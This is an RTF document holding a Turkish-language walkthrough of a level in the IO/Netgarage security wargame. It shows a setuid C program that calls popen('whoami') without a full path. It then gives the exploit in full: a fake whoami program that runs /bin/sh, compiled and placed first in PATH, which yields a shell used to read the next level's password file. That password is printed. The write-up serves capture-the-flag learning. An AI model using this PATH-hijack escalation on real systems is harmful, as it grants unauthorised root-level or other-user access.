{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 .SFNSMono-Heavy;\f1\fnil\fcharset0 .SFNSMono-Regular;\f2\fswiss\fcharset0 Helvetica;
\f3\fnil\fcharset0 Menlo-Bold;\f4\fnil\fcharset0 Menlo-Regular;\f5\fnil\fcharset0 .SFNSMono-Semibold;
\f6\fnil\fcharset0 .SFNSMono-Bold;\f7\fswiss\fcharset0 Helvetica-Bold;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\b\fs24 \cf0 Netgarage Level03
\f1\b0 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f2 \cf0 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f1\fs28 \cf0 level4@io:~$ cd /levels && cat level04.c
\f2\fs24 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 \
\

\f1\fs32 //writen by bla\
#include <stdlib.h>\
#include <stdio.h>\
\
int main() \{\
        char username[1024];\
        FILE* f = popen("whoami","r");\
        fgets(username, sizeof(username), f);\
        printf("Welcome %s", username);\
\
        return 0;\
\}\

\f2\fs24 \
\
\
\'97\'97\'97> 
\f3\b\fs28 Fgets
\f4\b0  ve 
\f3\b printf
\f4\b0  fonksiyonunu g\'f6r\'fcyoruz. Bu ikisi aras\uc0\u305 nda bir a\'e7\u305 k var. 
\f3\b \'91\\n\'92
\f4\b0  yok konumuz bunla ilgili asl\uc0\u305 nda san\u305 rsam 
\f3\b \'91\\0\'92
\f4\b0  olarak g\'f6r\'fcyordu. Yapaca\uc0\u287 \u305 m\u305 z asl\u305 nda yeni bir C dilinde program yazmak. Okuma ve yazma yetkisi 
\f3\b /tmp
\f4\b0 \'92de var. Peki C dilinde ne yazaca\uc0\u287 \u305 z. Yazaca\u287 \u305 m\u305 z evet 
\f3\b \'93/bin/sh\'94
\f4\b0  bu. Bize verilen level04 program\uc0\u305  level05 olarak g\'f6steriyordu. Bizim fonksiyonumuzdaki kodla bir sonraki kullan\u305 c\u305 y\u305  ge\'e7mi\u351  olaca\u287 \u305 z.\
\
\

\f5\b level4@io:/levels$: vim /tmp/whoami.c\

\f6 \

\fs30   1 #include <stdlib.h>\
  2\
  3 int main()\
  4 \{\
  5     system("/bin/sh");\
  6 \}
\f4\b0\fs28 \

\f2\fs24 \
\

\fs28 Derleme yaparken ismi mutlaka whoami olmal\uc0\u305  yoksa Source kodundaki whoami ile\u350 imdi derlemeye ge\'e7elim.\
\

\f5\b level4@io:/levels$: gcc /tmp/whoami.c -o whoami
\f7 \
\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f5 \cf0 level4@io:/levels$: export PATH=/tmp && ./level04
\f7 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f2\b0\fs24 \cf0 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f5\b\fs28 \cf0 level4@io:~$ cat /home/level5/.pass
\f2\b0\fs24 \
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\fs32 \cf0 DNLM3Vu0mZfX0pDd}